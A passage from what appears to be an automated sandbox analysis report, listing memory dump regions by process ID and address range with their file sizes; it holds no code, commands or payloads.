                                                                                                                                                                                                                                                                                            • memory/4852-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4864-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4876-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4884-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4912-294-0x0000000002A92000-0x0000000002A94000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4912-291-0x0000000002A90000-0x0000000002A92000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              8KB

                                                                                                                                                                                                                                                                                            • memory/4912-296-0x0000000002A95000-0x0000000002A96000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/4920-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4956-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4956-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4968-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/4984-283-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB

                                                                                                                                                                                                                                                                                            • memory/5020-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5028-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5028-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5032-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5040-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5060-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5076-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5084-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5156-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5180-247-0x0000000003310000-0x00000000034AC000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.6MB

                                                                                                                                                                                                                                                                                            • memory/5192-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5228-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5296-246-0x0000000004A80000-0x0000000004ADC000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                                            • memory/5296-245-0x00000000048B5000-0x00000000049B6000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                            • memory/5312-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5352-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5356-299-0x0000000004130000-0x0000000004174000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              272KB

                                                                                                                                                                                                                                                                                            • memory/5368-304-0x00000000049CD000-0x0000000004ACE000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1.0MB

                                                                                                                                                                                                                                                                                            • memory/5368-305-0x0000000004AD0000-0x0000000004B2C000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              368KB

                                                                                                                                                                                                                                                                                            • memory/5416-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5488-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5552-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5600-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5660-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5772-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5820-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5832-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5912-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/5956-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/6040-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/6092-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                            • memory/6120-288-0x00000000001F0000-0x00000000001F1000-memory.dmp
                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              4KB